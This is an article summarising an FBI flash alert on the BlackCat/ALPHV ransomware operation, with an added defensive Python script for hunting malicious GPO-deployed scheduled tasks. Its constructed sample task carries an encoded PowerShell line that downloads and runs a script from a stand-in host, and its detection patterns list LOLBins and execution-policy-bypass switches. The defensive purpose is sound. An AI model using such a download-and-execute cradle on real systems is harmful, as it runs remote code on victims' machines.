The Federal Bureau of Investigation (FBI) has issued a TLP:WHITE flash alert on the BlackCat ransomware-as-a-service (RaaS) operation. BlackCat, also known as ALPHV, surfaced in November 2021, immediately after the shutdown of the BlackMatter ransomware operation, which was itself a rebrand of DarkSide, the group behind the Colonial Pipeline attack. A representative of the operation has claimed to be a former BlackMatter/DarkSide affiliate who struck out alone; nevertheless, it is very likely that BlackCat is simply another rebrand of BlackMatter/DarkSide.
According to the FBI, many of the developers and money launderers behind BlackCat have ties to DarkSide/BlackMatter, which indicates established networks and considerable experience running RaaS operations. Although the operation is only months old, it has already claimed at least 60 victims worldwide. BlackCat typically targets large enterprises and demands ransoms of several million dollars in Monero or Bitcoin, although the group appears willing to negotiate with victims.
Unusually for ransomware, BlackCat is written in Rust, a memory-safe language regarded as more secure and offering good performance and reliable concurrent processing. Initial access is typically gained with previously compromised credentials; once inside, the actors compromise Active Directory user and administrator accounts. The ransomware executable is highly configurable, supports attacks on a wide range of corporate environments and several encryption methods, and can disable security features on the victim system.
The group uses Windows Task Scheduler to configure malicious Group Policy Objects (GPOs) that deploy the ransomware, initially relying on PowerShell scripts and Cobalt Strike; Microsoft Sysinternals and native Windows administrative tools are also used during the intrusion. Before encryption, victim data is exfiltrated, including data held with cloud service providers, and the actors threaten to publish it on their leak site if the ransom is not paid. The flash alert lists indicators of compromise (IoCs) and mitigations that organizations should apply to harden their environments and make such attacks harder to carry out.
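The GPO-delivered scheduled task is the artifact a responder will most want to check for, because a single Group Policy Preferences item can start a script on every domain-joined host at the next policy refresh. The Python below is an added example, not code from the FBI flash or this article: it parses a GPP ScheduledTasks.xml file, recovers the script text from any PowerShell -EncodedCommand argument, and flags tasks that launch a script host or LOLBin with hidden-window switches or a UNC-path payload. The XML is a constructed sample in the GPP layout (Properties/Task/Actions/Exec); the task names, the CORP\svc_backup account, the stage.example.invalid host and the encoded payload are invented, and attributes the parser never reads (clsid, uid, triggers, settings) are left out.

```python
"""Hunt Group Policy Preferences ScheduledTasks.xml for tasks that push a
script payload to every domain-joined host (added example; the sample
XML below is constructed, not taken from a real incident)."""
import base64
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from pathlib import PureWindowsPath
from typing import List, Optional

# Script hosts and LOLBins that a GPO-deployed task has little business running.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# Common spellings of -EncodedCommand, and the "quiet" switches typical of droppers.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
QUIET_RE = re.compile(r"(?i)-(?:w|win|windowstyle)\s+hidden|-nop\b|-noni\b|-(?:ep|executionpolicy)\s+bypass")


@dataclass
class GpoTask:
    name: str
    kind: str                 # element tag: ImmediateTaskV2, TaskV2, ImmediateTask, Task
    run_as: str
    command: str
    arguments: str
    decoded: Optional[str]    # recovered -EncodedCommand script text, if any
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def decode_encoded_command(arguments: str) -> Optional[str]:
    """-EncodedCommand is base64 over UTF-16LE; recover the plain script text."""
    m = ENC_RE.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable -EncodedCommand blob>"


def _assess(task: GpoTask) -> List[str]:
    reasons = []
    exe = PureWindowsPath(task.command).name.lower()
    if exe in INTERPRETERS:
        reasons.append(f"runs script host/LOLBin {exe}")
    if task.decoded is not None:
        reasons.append("carries a base64 -EncodedCommand payload")
    if QUIET_RE.search(task.arguments):
        reasons.append("hidden window / execution-policy bypass switches")
    if task.command.startswith("\\\\") or "\\\\" in task.arguments:
        reasons.append("payload referenced by UNC path")
    # An immediate task fires once on every targeted machine at the next policy
    # refresh, which is what turns one GPO edit into a domain-wide deployment.
    if reasons and task.kind.startswith("Immediate"):
        reasons.append("ImmediateTask: fires on every target at next policy refresh")
    return reasons


def parse_scheduled_tasks_xml(xml_text: str) -> List[GpoTask]:
    root = ET.fromstring(xml_text)
    tasks: List[GpoTask] = []
    for node in root:                          # one child element per GPP task item
        props = node.find("Properties")
        if props is None:
            continue
        actions = []
        if props.get("appName") is not None:   # legacy Task/ImmediateTask (V1) layout
            actions.append((props.get("appName", ""), props.get("args", "")))
        for exe in props.iter("Exec"):         # TaskV2/ImmediateTaskV2 layout
            actions.append(((exe.findtext("Command") or "").strip(),
                            (exe.findtext("Arguments") or "").strip()))
        for command, arguments in actions:
            task = GpoTask(name=node.get("name", ""), kind=node.tag,
                           run_as=props.get("runAs", ""), command=command,
                           arguments=arguments, decoded=decode_encoded_command(arguments))
            task.reasons = _assess(task)
            tasks.append(task)
    return tasks


def _encoded(ps: str) -> str:
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed sample: one dropper-style immediate task and one benign backup task.
SAMPLE_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <ImmediateTaskV2 name="WindowsUpdateCheck" changed="2021-12-01 03:14:00">
    <Properties action="C" name="WindowsUpdateCheck" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>powershell.exe</Command>
        <Arguments>-nop -w hidden -enc __BLOB__</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 name="NightlyBackup" changed="2020-05-10 09:00:00">
    <Properties action="U" name="NightlyBackup" runAs="CORP\svc_backup" logonType="Password">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>C:\Program Files\Backup\backup.exe</Command>
        <Arguments>/full</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
""".replace("__BLOB__", _encoded("IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/run.ps1')"))

if __name__ == "__main__":
    for t in parse_scheduled_tasks_xml(SAMPLE_XML):
        print(f"[{'SUSPICIOUS' if t.suspicious else 'ok'}] {t.kind} {t.name!r} runAs={t.run_as} cmd={t.command}")
        for r in t.reasons:
            print("    -", r)
        if t.decoded:
            print("    decoded:", t.decoded)
```

On a live domain, run the parser over every `\\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml` (and the User\Preferences counterpart), and compare each item's `changed` timestamp and the GPO's own modification time against the incident window; Task Scheduler event 4698 on endpoints and directory-service events 5136/5137 on domain controllers corroborate when the task and the GPO were created.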
As with all ransomware attacks, the FBI does not advise paying the ransom: there is no guarantee that files will be recovered, payment does not prevent further attacks, and nothing stops the data stolen in the attack from being published or otherwise misused. The FBI acknowledges, however, that in some cases payment may be the only option to protect customers, patients, employees, and shareholders.
Regardless of whether a ransom is paid, the FBI asks victims to report attacks to their local FBI field office. The FBI requests IP logs showing callbacks to foreign IP addresses, Bitcoin or Monero addresses and transaction IDs, communications with the ransomware group, the decryptor file, and/or a benign sample of an encrypted file.